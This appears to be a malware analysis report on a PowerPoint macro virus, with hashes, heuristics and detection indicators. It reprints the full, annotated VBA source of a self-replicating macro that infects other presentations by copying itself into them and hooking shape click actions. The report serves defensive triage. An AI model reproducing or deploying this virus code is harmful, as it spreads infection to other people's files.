Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5bf87297d8d5ea89…

MALICIOUS

Office (OLE)

24.0 KB Created: 1999-01-03 05:25:24 Authoring application: Microsoft PowerPoint First seen: 2012-06-14
MD5: 39442160dff1bc8ce8497dde8cac03cb SHA-1: a6e86685b76b0f1555f5334acfc1010c4e347777 SHA-256: 5bf87297d8d5ea89f01d4f2cc6a23d89493d7e228eabbad026bf0d5bfcb17e70
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

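The file is identified as malicious by ClamAV with the signature Win.Trojan.PP97M-6. Static analysis revealed the presence of VBA macros, including a CreateObject call, indicating potential malicious activity. The VBA script appears to be designed to search for and potentially infect other PowerPoint files, and the `actionhook` subroutine suggests an attempt to execute further stages, likely involving downloading and running additional payloads. Note, however, that the extracted macro shown below contains no network, download, or shell-execution calls: its single CreateObject call instantiates a hidden PowerPoint.Application that is used to open the `*.ppt` files found under the active presentation's folder, and `actionhook` is the mouse-click handler the macro attaches to shapes. The download assessment and the T1203 mapping are therefore not supported by the visible code and should be confirmed against the full sample.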

Heuristics 3

  • ClamAV: Win.Trojan.PP97M-6 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.PP97M-6
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3756 bytes
SHA-256: c7023f5c041bf2cfc0d9a103a7e4cf1403fdce763e17d1f8ac7c0de72e35303d
Detection
ClamAV: Win.Trojan.PP97M-6
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ShapeShift"
'<!--1nternal-->
'PPT.ShapeShift v0.1 /1nternal
' Analyst note: the module name "ShapeShift" doubles as the infection marker;
' WackPresentation skips any presentation whose VBA project already holds a
' component with this name. The two comment lines above are copied along with
' the rest of the module, so they recur in every infected file.
' Home is a module-level variable: actionhook sets it to ActivePresentation and
' WackPresentation reads the module source from Home's VBA project.
Private Home
' Analyst note: actionhook is the macro that WackShape assigns as the
' mouse-click action of shapes, so it runs when a hooked shape is clicked
' during a slide show. The Stealth parameter is never read in this body.
' On the last slide it replicates (open presentations, then *.ppt files on
' disk); on any other slide it occasionally hooks more shapes. It always ends
' by advancing the slide show, so the click appears to behave normally.
Sub actionhook(Stealth)
    ' Every runtime error is suppressed, so failed steps leave no visible prompt.
    On Error Resume Next
    Set LastSlide = ActivePresentation.Slides(ActivePresentation.Slides.Count)
    ' Remember the running presentation as the source of the module code.
    Set Home = ActivePresentation
    ' Replication branch: only taken while the slide show is on the last slide.
    If ActivePresentation.SlideShowWindow.View.Slide.SlideIndex = LastSlide.SlideIndex Then
        ' Stage 1: every presentation currently open in this PowerPoint instance.
        For Each InfPresentation In Presentations
            Call WackPresentation(InfPresentation)
        Next
        ' Stage 2: recursive search for *.ppt under the folder of the active
        ' presentation. Application.FileSearch was removed in Office 2007, so on
        ' later versions this stage presumably fails silently (errors are
        ' suppressed) - confirm on the target Office build.
        Set fs = Application.FileSearch
        fs.NewSearch
        fs.LookIn = ActivePresentation.Path
        fs.SearchSubFolders = True
        fs.FileName = "*.ppt"
        fs.Execute
        For Each target In fs.FoundFiles
            ' Skip paths containing "~" (text compare); presumably meant to avoid
            ' Office temporary/owner files - inferred, not stated in the code.
            If InStr(1, target, "~", 1) = 0 Then
                dontadd = False
                ' This is the CreateObject call behind the OLE_VBA_CREATEOBJ
                ' heuristic: a second, hidden PowerPoint instance per found file.
                ' The visible code never calls Quit on PowerObj, so lingering
                ' windowless PowerPoint processes are a possible host indicator.
                Set PowerObj = CreateObject("PowerPoint.Application")
                PowerObj.Visible = False
                Set PVict = PowerObj.Presentations.Open(target)
                ' Skip files that are already open in the current instance (those
                ' were handled in stage 1). The loop stops at Count - 1, so the
                ' highest-indexed open presentation is not compared.
                For i = 1 To Presentations.Count - 1
                    If Presentations(i).FullName = PVict.FullName Then dontadd = True
                Next
                If dontadd <> True Then Call WackPresentation(PVict)
                PVict.Close
                Set PVict = Nothing
            End If
        Next
    Else
        ' Non-replication branch: roughly 1 click in 10 triggers extra hooking.
        If Int(Rnd * 10) = 0 Then
            Call RandomWackSlide(ActivePresentation)
            ' Remove and re-create the "hookme" overlay shape on the last slide.
            For Each ShapetoWack In LastSlide.Shapes
                If ShapetoWack.Name = "hookme" Then ShapetoWack.Delete
            Next
            Call SlideIn(LastSlide)
            ' Nested 1-in-10 chance: the only user-visible effect in this module.
            If Int(Rnd * 10) = 0 Then MsgBox ("PPT.ShapeShift v0.1 /1nternal")
        End If
    End If
    ' Advance the show so the click still moves to the next slide.
    ActivePresentation.SlideShowWindow.View.Next
End Sub
' Analyst note: SlideIn hooks one slide. It makes sure the slide carries a
' slide-sized shape named "hookme" whose line and fill are hidden, then passes
' every shape on the slide to WackShape. A shape named "hookme" covering the
' whole slide is a useful marker when triaging a suspect presentation.
Sub SlideIn(SlideW)
    On Error Resume Next
    dontadd = False
    ' Do not add a second overlay if one is already present.
    For Each ShapetoWack In SlideW.Shapes
        If ShapetoWack.Name = "hookme" Then dontadd = True
    Next
    If dontadd <> True Then
        ' New shape at (0, 0) with the slide's width and height; the shape type is
        ' a random value from 1 to 140, so the type itself is not a stable indicator.
        Set ShapetoWack = SlideW.Shapes.AddShape(Int(Rnd * 140) + 1, 0, 0, SlideW.Parent.PageSetup.SlideWidth, SlideW.Parent.PageSetup.SlideHeight)
        ShapetoWack.Name = "hookme"
        ' Sent behind other shapes, with outline and fill switched off.
        ShapetoWack.ZOrder (msoSendToBack)
        ShapetoWack.Line.Visible = False
        ShapetoWack.Fill.Visible = False
        Call WackShape(ShapetoWack)
    End If
    ' Hook every shape on the slide, not just the overlay.
    For Each ShapetoWack In SlideW.Shapes
        Call WackShape(ShapetoWack)
    Next
End Sub
' Analyst note: WackShape turns a shape into a trigger. If the shape's
' mouse-click action is 0 (no action configured), it is set to run the macro
' "actionhook". Shapes that already have a click action are left unchanged.
' Detection: a click action of type run-macro pointing at "actionhook" on
' shapes in a presentation is a direct indicator of this module.
Sub WackShape(ShapetoWack)
    On Error Resume Next
    If ShapetoWack.ActionSettings(ppMouseClick).Action = 0 Then
        ShapetoWack.ActionSettings(ppMouseClick).Action = ppActionRunMacro
        ShapetoWack.ActionSettings(ppMouseClick).Run = "actionhook"
    End If
End Sub
' Analyst note: RandomWackSlide picks one random slide of PresW and one random
' shape on that slide, and passes the shape to WackShape. Because the choice is
' random, the set of hooked shapes differs from one infected file to the next.
Sub RandomWackSlide(PresW)
    On Error Resume Next
    Set SlidetoWack = PresW.Slides(Int(Rnd * PresW.Slides.Count) + 1)
    Call WackShape(SlidetoWack.Shapes(Int(Rnd * SlidetoWack.Shapes.Count) + 1))
End Sub
' Analyst note: WackPresentation is the infection routine. It copies this
' module into InfPresentation's VBA project, hooks shapes, and saves the file.
' It depends on programmatic access to the VBA project object model
' (InfPresentation.VBProject); where the Office "Trust access to the VBA
' project object model" setting is disabled, that access should fail and, with
' errors suppressed, the later steps run against an unset NewMod - TODO confirm
' the resulting behavior in a sandbox.
Sub WackPresentation(InfPresentation)
    On Error Resume Next
    dontadd = False
    ' Already-infected check: a component named "ShapeShift" means skip.
    For Each ModComponent In InfPresentation.VBProject.VBComponents
        If ModComponent.Name = "ShapeShift" Then dontadd = True
    Next
    If dontadd <> True Then
        Set Slider = InfPresentation.Slides(InfPresentation.Slides.Count)
        ' Component type 1 is a standard code module.
        Set NewMod = InfPresentation.VBProject.VBComponents.Add(1)
        NewMod.Name = "ShapeShift"
        ' Copy all lines of the "ShapeShift" module from Home (set by actionhook)
        ' into the new module, so the copy is a line-for-line duplicate.
        NewMod.CodeModule.InsertLines 1, Home.VBProject.VBComponents("ShapeShift").CodeModule.Lines(1, Home.VBProject.VBComponents("ShapeShift").CodeModule.CountOfLines)
        ' Hook the last slide plus three randomly chosen shapes.
        Call SlideIn(Slider)
        Call RandomWackSlide(InfPresentation)
        Call RandomWackSlide(InfPresentation)
        Call RandomWackSlide(InfPresentation)
        ' The target file is modified on disk here; its modification time and
        ' hash change at this point, which helps when building a timeline.
        InfPresentation.Save
    End If
End Sub